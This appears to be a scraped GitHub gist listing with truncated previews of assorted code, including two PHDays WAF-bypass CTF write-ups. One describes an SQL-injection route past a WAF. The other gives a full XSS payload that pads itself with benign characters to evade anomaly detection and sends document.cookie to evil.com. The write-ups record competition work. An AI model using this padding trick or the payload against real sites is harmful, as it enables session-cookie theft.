View gist:ec83d04d04b676d8220266dbb25783bd
Two approaches to building a binary translation system were implemented. In the first, the system sits between the microprocessor and the x86 code executed on it, translating the code of the BIOS, the operating system, drivers and application programs. For the user, a computer system based on the Elbrus microprocessor with full binary translation is indistinguishable from a system based on x86 microprocessors. In the second approach, the system is an ordinary Linux application running under the Linux OS. It allows x86 Linux applications to run at the same time as applications compiled for the Elbrus platform.
View 1.c
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>
#define NUM_THREADS 5
void *PrintHello(void *threadid)
{
long tid;
tid = (long)threadid;
if (tid == 0){
@ngo
ngo / Main.java
Last active Jun 20, 2018
SAX sucks
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
public class Main {
public static void main(String[] args) {
try {
@ngo
ngo / Main.java
Created Jun 19, 2018
Dynamic loading of jython jars and classloader problems
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
public class Main {
public static void main(String[] args) {
try {
View command_f3a628a4-ace0-4934-a7c1-ff7e6882e3d0.php
<?php
srand(time());
class DomainFramer2
{
private $_path_cands = Array();
private $_path_cands2 = Array();
private $_cscript_payload = "";
private $_current_cscript_path = "";
View solve.py
#!/usr/bin/env python
import math
from collections import defaultdict
import sys
def factors(n):
result = []
for i in range(2,n+1): # test all integers between 2 and n
s = 0
while n/i == math.floor(n/float(i)): # is n/i an integer?
n = n/float(i)
@ngo
ngo / XSD
Last active Sep 3, 2015
PhDays 2015 WAF bypass challenge
There was an XSD challenge, which nobody, as far as I know, solved in the intended way. We weren't quite sure that this was XSD, and found SQLi first.
The vulnerable interface was parsing XML from POST requests to /tickets.php, and its id parameter was vulnerable to SQLi. We quickly understood that the WAF enforced the parameter length to be exactly 35 chars long, which was a nuisance. Fortunately, we found that changing the host to foo.waf-bypass.com (from the intended choo-choo.waf-bypass.com) removed that restriction. All that was left was to bypass the syntax anomaly detection, which was quite easy. The final vector is as follows (the DB was Postgres, so this uses a relatively new error-based box() vector with XML functions to quickly get the whole database):
POST /tickets.php HTTP/1.1
Host: hui.phdays.com
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Referer: http://choo-choo.phdays.com/index.php?search=%27%22%3E
Content-Length: 174
Cookie: WAFBYPASS=5727e690-39f4-44f1-a271-c6edfc1b4336
Connection: keep-alive
View http_test.py
from http_parser.parser import HttpParser as HttpParserC
from http_parser.pyparser import HttpParser as HttpParserPy
REQUEST = 'GET /hjs?m_mode=multipart&site=news&region=US&lang=en-US&pagetype=contentb&&__r=1391585859471&post=%7B%22reqs%22%3A%5B%7B%22handler%22%3A%22cfg.maple_dali.handler.refresh%22%2C%22data%22%3A%7B%22maple%22%3A%7B%22module%22%3A%22p_30345826%22%2C%22ba%22%3A%7B%22_txnid%22%3A0%2C%22_mode%22%3A%22json%22%2C%22_id%22%3A%22p_30345826%22%2C%22_container%22%3A0%2C%22_action%22%3A%22show%22%2C%22_subAction%22%3A%22getButtons%22%2C%22noups%22%3A1%2C%22sec%22%3A%22td-strm-dr%22%2C%22layout%22%3A%22horizontal%22%2C%22title%22%3A%22Sign-in%20and%20we%27ll%20show%20you%20more%20like%20this%20in%20the%20future.%22%2C%22narrow%22%3A1%7D%7D%7D%2C%22txId%22%3A1%7D%5D%2C%22props%22%3A%7B%22dali%22%3A%7B%22crumb%22%3A%22q%2FSc0Cy2vZm%22%2C%22yuid%22%3A%22%22%2C%22loggedIn%22%3A%220%22%2C%22mLogin%22%3A0%7D%7D%7D HTTP/1.1\r\nHost: news.yahoo.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:26.0) Gec
@ngo
ngo / Anomaly
Last active Sep 14, 2017
PHDays Waf Bypass
In this task we had to bypass a badly trained anomaly detection algorithm and perform an XSS attack.
We didn't have to figure out exactly how the anomaly detection worked, but we soon understood that the anomaly scoring was based on the density of "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's):
anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/>